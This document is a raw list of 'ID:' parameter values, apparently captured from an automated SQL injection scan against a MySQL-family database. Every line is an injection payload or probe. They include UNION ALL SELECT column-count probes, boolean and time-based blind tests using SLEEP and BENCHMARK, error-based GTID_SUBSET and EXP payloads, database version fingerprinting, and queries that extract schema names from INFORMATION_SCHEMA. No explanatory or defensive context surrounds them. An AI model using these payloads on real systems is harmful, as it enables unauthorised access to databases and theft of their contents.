ID:-7596" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-8711" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-4122" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9718" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-4680" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-4070" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-4829" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-3335" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-4675" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-6218" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-8631" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1364" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1543" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-7913" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-6675" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1822" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1552" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-5482" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1170" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1875" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-2892" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-8841" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9393" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-3650" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-7542" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-3981" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-4629" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-2230" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-3447" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9393" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-8183" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-8256" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-4823" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1142" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-6666" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1092" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-6375" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-4120" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-2657" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-7534" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT (CASE WHEN (5364=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5364) THEN 1 ELSE 0 END)),0x7170766271),6202)-- XRpQ
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT REPEAT(0x34,1024)),0x7170766271),2742)-- DCuQ
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT REPEAT(0x30,190)),0x7170766271),5813)-- qaQi
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x7170766271),5472)-- BcPM
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT (CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END)),0x7170766271),6085)-- CNWV
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END)),0x7170766271),4465)-- LiCO
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END)),0x7170766271),3876)-- AzUs
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT (CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END)),0x7170766271),7856)-- UgBj
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x7170766271),7165)-- Ofbp
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7170766271),5163)-- ucdZ
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x7170766271),9026)-- nOJP
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x7170766271),8299)-- wdTp
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),0x7170766271),4476)-- YFfC
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),0x7170766271),4090)-- NDyS
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),0x7170766271),2031)-- cWwQ
ID:1' -- 
ID:1" -- 
ID:1"
ID:1" and if(length(database())=8,sleep(3),1)-- 
ID:1
ID:
ID:e4d6f7d5"
ID:5ad67ff6)
ID:4b6d29db51ec46'
ID:
ID:896f1e233ca5'
ID:c300a60e"
ID:c71a8fd37b9e)
ID:
ID:8248761a7149)
ID:20966c4db001e8'
ID:10b60c87"
ID:
ID:71d284efbd91"
ID:22bb756f37'
ID:4a2676a017)
ID:
ID:e4a6f8c3499e4f"
ID:cd699b35'
ID:26561b523258063a)
ID:
ID:632c2ca9935f2b4c)
ID:6f722bcb02e6aa"
ID:0397b5c60c'
ID:
ID:6bd8b7fbfb8a91'
ID:f2435751081c"
ID:94eccc48fd4033)
ID:1
ID:1
ID:1
ID:5433
ID:1("(..),',)
ID:1'sYOPuO<'">PoHcsa
ID:1) AND 4958=8826 AND (7377=7377
ID:1) AND 6429=6429 AND (7962=7962
ID:1 AND 4961=1768
ID:1 AND 6429=6429
ID:1 AND 2661=1261-- rXxW
ID:1 AND 6429=6429-- uFtf
ID:1') AND 1446=1205 AND ('ydpJ'='ydpJ
ID:1') AND 6429=6429 AND ('HHzF'='HHzF
ID:1' AND 7847=5585 AND 'jipc'='jipc
ID:1' AND 6429=6429 AND 'wyIC'='wyIC
ID:(SELECT (CASE WHEN (1446=9259) THEN 1 ELSE (SELECT 9259 UNION SELECT 6592) END))
ID:(SELECT (CASE WHEN (7504=7504) THEN 1 ELSE (SELECT 4526 UNION SELECT 8156) END))
ID:(SELECT CONCAT(CONCAT(0x717a716271,(CASE WHEN (8512=8512) THEN 0x31 ELSE 0x30 END)),0x71626b6a71))
ID:1) AND 9320=6389#
ID:1) AND 5279=5279#
ID:1)) AND 5068=6290#
ID:1)) AND 5279=5279#
ID:1))) AND 2244=5840#
ID:1))) AND 5279=5279#
ID:1 AND 3164=9327#
ID:1 AND 5279=5279#
ID:1)) AS VXVC WHERE 1801=1801 AND 8643=8549#
ID:1)) AS qrly WHERE 8218=8218 AND 5279=5279#
ID:1) AS AJdX WHERE 3950=3950 AND 4190=2251#
ID:1) AS DNzD WHERE 4476=4476 AND 5279=5279#
ID:1` WHERE 1155=1155 AND 8229=5649#
ID:1` WHERE 8902=8902 AND 5279=5279#
ID:1`) WHERE 3131=3131 AND 1075=6868#
ID:1`) WHERE 1519=1519 AND 5279=5279#
ID:1') AND 1558=5268#
ID:1') AND 5279=5279#
ID:1' AND 3291=5341#
ID:1' AND 5279=5279#
ID:1" AND 6405=2948#
ID:1" AND 5279=5279#
ID:1" AND 3136=4424#
ID:1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a716271,(SELECT (ELT(2014=2014,1))),0x71626b6a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- JoNm
ID:1" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a716271,(SELECT (ELT(3195=3195,1))),0x71626b6a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- ndUh
ID:1" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x717a716271,(SELECT (ELT(4480=4480,1))),0x71626b6a71,0x78))x))-- vHme
ID:1" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x717a716271,(SELECT (ELT(7680=7680,1))),0x71626b6a71,0x78))x))-- etcA
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT (ELT(7924=7924,1))),0x71626b6a71),7924)-- eqYq
ID:(SELECT CONCAT(0x717a716271,(ELT(2213=2213,1)),0x71626b6a71))
ID:1";SELECT SLEEP(5)#
ID:1";SELECT SLEEP(5)-- zMdD
ID:1";(SELECT * FROM (SELECT(SLEEP(5)))HHCC)#
ID:1";(SELECT * FROM (SELECT(SLEEP(5)))dWrm)-- suTv
ID:1";SELECT BENCHMARK(5000000,MD5(0x6f415856))#
ID:1";SELECT BENCHMARK(5000000,MD5(0x53775747))-- qoJu
ID:1" AND (SELECT 9483 FROM (SELECT(SLEEP(5)))SKFH)-- Uowy
ID:1" AND (SELECT 9483 FROM (SELECT(SLEEP(0)))SKFH)-- Uowy
ID:1" AND (SELECT 9483 FROM (SELECT(SLEEP(5)))SKFH)-- Uowy
ID:1" ORDER BY 1#
ID:1" ORDER BY 2771#
ID:1" ORDER BY 10#
ID:1" ORDER BY 6#
ID:1" ORDER BY 4#
ID:1" ORDER BY 3#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x717a716271,0x6f727a694b65764e5570664777506d63545742736d656a774d797357676348747379476868734376,0x71626b6a71)#
ID:1" UNION ALL SELECT NULL,CONCAT(0x717a716271,0x516e42614a6e747372434561666c6b6b685655516f4d51737852546e627a7a5254716c7479727464,0x71626b6a71),NULL#
ID:1" UNION ALL SELECT CONCAT(0x717a716271,0x7678515a6674424d494145614a7448437268467951734a66634f4a5a6b675a784e4c6f76685a6756,0x71626b6a71),NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x717a716271,0x6773706d685458716e56,0x71626b6a71)#
ID:1" UNION ALL SELECT NULL,CONCAT(0x717a716271,0x42746e4d6f6c7059764d,0x71626b6a71),NULL#
ID:1" UNION ALL SELECT CONCAT(0x717a716271,0x4b586a6252624b534d6f,0x71626b6a71),NULL,NULL#
ID:-4005" UNION ALL SELECT NULL,NULL,CONCAT(0x717a716271,0x4e6e67684e73526a45485344704f53567143547a59456b5a5a77664c505576637347416144567059,0x71626b6a71)#
ID:-9223" UNION ALL SELECT NULL,CONCAT(0x717a716271,0x634746487279495768776e7347744d7167546d78426b756a4c504d674e704b617566587650496565,0x71626b6a71),NULL#
ID:-2300" UNION ALL SELECT CONCAT(0x717a716271,0x705274496871426a58545558577773744541546c504550656c44444864636e4f6a424d6577617471,0x71626b6a71),NULL,NULL#
ID:-3366" UNION ALL SELECT NULL,NULL,CONCAT(0x717a716271,0x6a46766568574d556e57,0x71626b6a71)#
ID:-1882" UNION ALL SELECT NULL,CONCAT(0x717a716271,0x6d75555479634f534268,0x71626b6a71),NULL#
ID:-9436" UNION ALL SELECT CONCAT(0x717a716271,0x74427677654e77457769,0x71626b6a71),NULL,NULL#
ID:1" UNION ALL SELECT CONCAT(0x717a716271,0x475442416749474b6b6356654f716744446b796474564f62667746496b6a65667176656e68625244,0x71626b6a71),49,49#
ID:1" UNION ALL SELECT 49,CONCAT(0x717a716271,0x726c485467596c42624442794568735663646556494e564150506258544a56444752484c57597945,0x71626b6a71),49#
ID:1" UNION ALL SELECT 49,49,CONCAT(0x717a716271,0x557242635148476b48516a7a4b764a697a5371764546635a5062644163636264795956616f4f7574,0x71626b6a71)#
ID:1" UNION ALL SELECT CONCAT(0x717a716271,0x4a695079674d64497663,0x71626b6a71),49,49#
ID:1" UNION ALL SELECT 49,CONCAT(0x717a716271,0x4b506944534842496574,0x71626b6a71),49#
ID:1" UNION ALL SELECT 49,49,CONCAT(0x717a716271,0x51437a41584e7967454c,0x71626b6a71)#
ID:-6714" UNION ALL SELECT 49,CONCAT(0x717a716271,0x666671477656704d62734f58564441614e5779587849456867535941576873666a66614957427979,0x71626b6a71),49#
ID:-4750" UNION ALL SELECT 49,49,CONCAT(0x717a716271,0x4d6e497266747443727a4e46707379474f5453446e4a4956696644425a7a787a6278764c4864456f,0x71626b6a71)#
ID:-8755" UNION ALL SELECT CONCAT(0x717a716271,0x7650466d515a454a5879534c637a5a44724e6b78737170716b6d4c4469587561426453676958446f,0x71626b6a71),49,49#
ID:-6179" UNION ALL SELECT 49,CONCAT(0x717a716271,0x46427a697647506b4844,0x71626b6a71),49#
ID:-6778" UNION ALL SELECT 49,49,CONCAT(0x717a716271,0x517a4365494376484e58,0x71626b6a71)#
ID:-6568" UNION ALL SELECT CONCAT(0x717a716271,0x4e504e59756769697070,0x71626b6a71),49,49#
ID:1" UNION ALL SELECT NULL#
ID:1" UNION ALL SELECT NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x717a716271,0x586b52477864516f72426a6b4161684956595a52576e5a4567545855454d6247444864494d536979,0x71626b6a71)#
ID:1" UNION ALL SELECT CONCAT(0x717a716271,0x6e524e48634144686e424743486a564a785a48776f485674556250534f574a4d5263464650435444,0x71626b6a71),NULL,NULL#
ID:1" UNION ALL SELECT NULL,CONCAT(0x717a716271,0x6b4a4979544d517758714f4865794f41644a576e63696d62444669584c57494243617641555a6263,0x71626b6a71),NULL#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x717a716271,0x56636b46556d6a624158,0x71626b6a71)#
ID:1" UNION ALL SELECT CONCAT(0x717a716271,0x6a5a47414b5942437455,0x71626b6a71),NULL,NULL#
ID:1" UNION ALL SELECT NULL,CONCAT(0x717a716271,0x64446f6b4c7369626479,0x71626b6a71),NULL#
ID:-4333" UNION ALL SELECT NULL,NULL,CONCAT(0x717a716271,0x6a6874484b42536a6b6c4d6e7545754d767670525446754a4873584c766d6f67756c6b70716d5567,0x71626b6a71)#
ID:-8226" UNION ALL SELECT CONCAT(0x717a716271,0x63664b676f6b586959734e42566154655a4b50654b456653664f7968427a4772456e695859684f69,0x71626b6a71),NULL,NULL#
ID:-7236" UNION ALL SELECT NULL,CONCAT(0x717a716271,0x45466f63646b6d596a4d427452665141755064414c626d7475704e6866787069524d546244717757,0x71626b6a71),NULL#
ID:-2791" UNION ALL SELECT NULL,NULL,CONCAT(0x717a716271,0x4b64614d51656f714165,0x71626b6a71)#
ID:-5821" UNION ALL SELECT CONCAT(0x717a716271,0x486250665556566c7150,0x71626b6a71),NULL,NULL#
ID:-5545" UNION ALL SELECT NULL,CONCAT(0x717a716271,0x45507268466464744671,0x71626b6a71),NULL#
ID:1" UNION ALL SELECT 65,CONCAT(0x717a716271,0x724e716c545742644e766c62444a62504b425448516a48494c6c497554586d466e6d59714d714e70,0x71626b6a71),65#
ID:1" UNION ALL SELECT 65,65,CONCAT(0x717a716271,0x585a646a7351696c7775545844494e4f577264577456446a4f646769466e696279786a794e675779,0x71626b6a71)#
ID:1" UNION ALL SELECT CONCAT(0x717a716271,0x6f484b5850564c67716250474d6e4b7752757a4d734e6b55414269766d5257576a62426d6363726e,0x71626b6a71),65,65#
